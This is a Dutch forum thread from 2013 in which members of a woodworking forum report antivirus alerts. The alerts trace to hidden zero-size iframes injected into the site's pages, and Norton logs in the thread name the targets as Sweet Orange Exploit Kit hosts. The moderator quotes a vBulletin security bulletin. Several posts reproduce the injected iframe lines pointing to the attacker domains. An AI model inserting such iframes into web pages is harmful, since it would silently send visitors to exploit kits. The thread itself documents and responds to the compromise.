Virusscanner

Sang

Actieve deelnemer
19 mrt 2013
600
15
Berkel en Rodenrijs
Mijn virusscanner is het niet eens met deze regel in de broncode van 'onze' website

<iframe src="http://deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217" width="0" height="0"></iframe>


Ik kan er op google niets over vinden, maar wel raar, nooit eerder last van gehad.
 

Wim Kluck

Oud hout
28 feb 2010
10.584
2.503
Gaanderen
Norton geeft bij mij Categorie: Inbraakpreventie
Datum en tijd,Risico,Activiteit,Status,Aanbevolen actie,Naam van IPS-waarschuwing,Standaardactie,Ondernomen actie,Aanvallende computer,URL van aanvaller,Doeladres,Bronadres,Verkeersbeschrijving
3-9-2013 21:23:17,Hoog,Inbraakpoging van deniedatomtoms.biz geblokkeerd.,Geblokkeerd,Geen actie vereist,Web Attack: Sweet Orange Exploit Kit Website,Geen actie vereist,Geen actie vereist,"deniedatomtoms.biz (95.163.121.138, 41991)",deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217,"GEBRUIKER-HP (192.168.1.114, 51711)",95.163.121.138 (95.163.121.138),"TCP, Poort 41991"
Netwerkverkeer van <b>deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217</b> komt overeen met de handtekening van een bekende aanval. De aanval was het resultaat van \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE. Klik op <b>Mij niet meer waarschuwen</b> in het venster <b>Acties</b> als u niet meer gewaarschuwd wilt worden voor dit type verkeer.
 

SunRayes

Oud hout
11 sep 2011
2.755
145
Rotterdam
Ik heb hetzelfde: Ook met Norton

Categorie: Inbraakpreventie
Datum en tijd,Risico,Activiteit,Status,Aanbevolen actie,Naam van IPS-waarschuwing,Standaardactie,Ondernomen actie,Aanvallende computer,URL van aanvaller,Doeladres,Bronadres,Verkeersbeschrijving
3-9-2013 21:25:05,Hoog,Inbraakpoging van deniedatomtoms.biz geblokkeerd.,Geblokkeerd,Geen actie vereist,Web Attack: Sweet Orange Exploit Kit Website,Geen actie vereist,Geen actie vereist,"deniedatomtoms.biz (95.163.121.138, 41991)",deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217," enz.........
 

LMM

Actieve deelnemer
16 jul 2012
270
1
Groningen
mijn AVG geeft ook steeds een pop-up, en gisteren was er een link uit roemenie die de boel liet afgaan
 

jaap

Moderator
9 mrt 2008
5.045
1.674
Terkaple
www.woodworking.nl
Beste forummers, ook per pb al een reactie gekregen. Wat ik er nu van weet is, dat het een brak stukje java software is in de installatie directory. Zonder direct alles over hoop te halen, heeft het mijn aandacht. Wordt spoedig vervolgd......

jaap
 

jaap

Moderator
9 mrt 2008
5.045
1.674
Terkaple
www.woodworking.nl
Krijg net de onderstaande mail, heb de actie uitgevoerd, nu even wachten.

jaap

-----------------------------------------

vBulletin Security eBulletin
http://www.vbulletin.com/
September 3rd, 2013

* vBulletin 4.1.x & 5.0.x Security Issue
* Your License Information
* Contact Us

------ vBulletin 4.1.x & 5.0.x Security Issue ------

A potential exploit vector has been found in the vBulletin 4.1+ and 5.0+ installation directories. Our developers are investigating this issue at this time. If deemed necessary we will release the necessary patches. In order to prevent this issue on your vBulletin sites, you should delete the install directory for your installation. This folder is not required for normal operation of vBulletin.

The directories that should be deleted are:

4.x - /install/

5.x - /core/install

On vB5, make sure you delete only the install folder, not the core folder.
After deleting these directories your sites can not be affected by the issues we’re currently investigating.

vBulletin 3.x would not be affected by these issues. However if you want the best security precautions, you should delete your install directory as well.

The Support forum thread on this topic can be found here - http://www.vbulletin.com/forum/foru...l-vbulletin-exploit-vbulletin-4-1-vbulletin-5
 

Spaander

Post veel
26 jul 2011
1.948
88
West-Friesland
Sinds gisteren krijg ik ook steeds popups met waarschuwingen.

Melding AVG-01.jpg
Melding AVG-02.jpg

Na de eerste twee meldingen java opnieuw geinstalleerd (zou de oplossing moeten zijn)
Melding na install Java-01.jpg
Melding na install Java-02.jpg

Daarna komen deze 2 meldingen heel irritant om de haverklap op het scherm.
 

bruine_beer

Actieve deelnemer
2 dec 2012
288
42
Heers, België
De server is geïnfecteerd met een programmaatje dat dagelijks de code van de webspagina's aanpast:

</script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></div> </div> </div></div> </div> <iframe src="http://abiltyrichly.biz:41991/flash/view.php?join=217" width="0" height="0"></iframe> <div class="contentWrap clearfix"> <div id="navbar" class="navbar"> <div class="navbarLeft"><div class="navbarRight"> <ul id="navtabs" class="navtabs floatcontainer">

Iemand zal gebruik gemaakt hebben van een beveiligingslek van de webserver of van de forum-software om de webpagina's aan te passen.
 

Resetter

Actieve deelnemer
20 apr 2013
268
0
Dedemsvaart
Ik had Rick er ook al een mailtje over gestuurd, well irrie elke keer dat je een pagina opent word java en de virus scanner gek ;)
 

harry

Nieuw lid
30 mrt 2012
20
0
Hallo

Is er al een oplossing voor dit probleem want mijn AVG geeft ook steeds melding gisteren constant vandaag niet erg vreemd, ik onderneem zelf nog geen actie voordat ik weet waar het probleem zit

Gr Harry
 

Barneveld

Actieve deelnemer
10 jan 2013
68
0
Ik draai (ook) IE10 in combinatie met Free AVG, de gratis versie dus.

Als je virusscanner de besmette link niet blokkeert, dan gaat je pc er gewoon heen. En dat lijkt me geen fijn idee!

dat is het hem juist....ik krijg niet eens een besmette link om op te klikken hahahaah.
 

mdamsma

Actieve deelnemer
15 mei 2011
277
19
Pas vanaf vandaag krijg ik thuis een melding van mijn virusscanner Eset Nod 32 samen IE
Krijg de pagina dus niet meer geopend , zegt een trojan horse
Op mijn werk geen problemen nog
Hopelijk komt er snel een oplossing
iPad niet altijd voorhanden

Menno
 

Deze plek is voor toekomstige tekst. Door nu alvast deze kolom te activeren blijft de kolommen structuur ongewijzigd en de lezerservaring hetzelfde als er hier content geplaatst gaat worden.

Hier kan straks ook info geplaatst worden.